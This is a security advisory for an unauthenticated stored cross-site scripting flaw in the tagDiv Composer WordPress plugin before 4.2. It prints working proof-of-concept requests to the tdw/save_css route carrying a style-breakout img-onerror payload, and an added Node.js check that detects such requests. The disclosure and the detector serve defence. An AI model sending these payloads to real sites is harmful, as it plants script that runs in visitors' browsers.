wpexploit | Truoc Phan | WPEX-ID:E6D8216D-ACE4-48BA-AFCA-74DA0DC5ABB5
Aug 17, 2023 - 12:00 a.m.

tagDiv Composer < 4.2 - Unauthenticated Stored XSS

Tags: tagdiv composer, unauthenticated, stored xss, newsmag, plugins, admin, browser console, wp admin, xss

AI Score: 6.2 Medium (Confidence: High)
EPSS: 0.001 Low (Percentile: 30.2%)

Description

The plugin, used as a companion by the Newspaper and Newsmag themes from tagDiv, lacks authorisation on a REST route and neither validates nor escapes some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.

Note: The issue was partially fixed in 4.1 (still exploitable by Admin+ as only authorisation was added) and fully fixed in 4.2.

Before 4.1:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Run the following code in the browser console while logged out:

fetch( '/wp-json/tdw/save_css', {
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    body: "compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E",
    method: "POST",
} );


In version 4.1, exploitable by Admin:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Log in as an admin, and run the following code in a browser console within WP Admin:

await wp.apiRequest( { path: 'tdw/save_css', type: 'POST', data: { compiled_css: "</style><img src=x onerror=alert('XSS-Checker')><style>" } } );

3. Load a frontend page to see the XSS.
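
Added example, not part of the original advisory: a Node.js check for reviewing captured requests, which flags POSTs to the tdw/save_css route whose compiled_css value would close the surrounding style block. The request records and their field names (id, method, url, contentType, body) are constructed assumptions about how the requests were logged, and the check also covers WordPress's ?rest_route= form of the same route.

```javascript
// Added example: flag POSTs to the tdw/save_css REST route whose compiled_css
// would close the surrounding <style> block. Request records are constructed.
const ROUTE = '/tdw/save_css';

// WordPress serves REST routes at /wp-json/<route> and at ?rest_route=<route>.
function restRoute(url) {
  const u = new URL(url, 'http://site.invalid');
  const viaQuery = u.searchParams.get('rest_route');
  if (viaQuery) return viaQuery.replace(/\/+$/, '');
  const m = u.pathname.match(/\/wp-json(\/.*?)\/*$/);
  return m ? m[1] : null;
}

// Pull compiled_css out of a form-urlencoded or JSON request body.
function compiledCss(req) {
  if ((req.contentType || '').toLowerCase().includes('json')) {
    try {
      const value = JSON.parse(req.body).compiled_css;
      return typeof value === 'string' ? value : null;
    } catch {
      return null; // malformed JSON: nothing to inspect
    }
  }
  return new URLSearchParams(req.body || '').get('compiled_css');
}

// Return the ids of requests that carry a </style breakout (tag names are
// case-insensitive in HTML, hence the /i flag).
function findStyleBreakouts(requests) {
  return requests
    .filter((req) => req.method === 'POST' && restRoute(req.url) === ROUTE)
    .filter((req) => /<\/style/i.test(compiledCss(req) || ''))
    .map((req) => req.id);
}

const PAGE_PAYLOAD = "</style><img src=x onerror=alert('XSS-Checker')><style>";
const SAMPLE_REQUESTS = [ // constructed records; field names are assumptions
  { id: 1, method: 'POST', url: '/wp-json/tdw/save_css',
    contentType: 'application/x-www-form-urlencoded',
    body: 'compiled_css=' + encodeURIComponent(PAGE_PAYLOAD) },
  { id: 2, method: 'POST', url: '/index.php?rest_route=/tdw/save_css',
    contentType: 'application/json', body: JSON.stringify({ compiled_css: PAGE_PAYLOAD }) },
  { id: 3, method: 'POST', url: '/wp-json/tdw/save_css',
    contentType: 'application/x-www-form-urlencoded',
    body: 'compiled_css=' + encodeURIComponent('.td-header { color: #222; }') },
  { id: 4, method: 'POST', url: '/wp-json/wp/v2/comments',
    contentType: 'application/json', body: JSON.stringify({ content: PAGE_PAYLOAD }) },
];
console.log(findStyleBreakouts(SAMPLE_REQUESTS));
```

On 4.1, where the route requires authorisation, a flagged request was made from an admin-level session.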
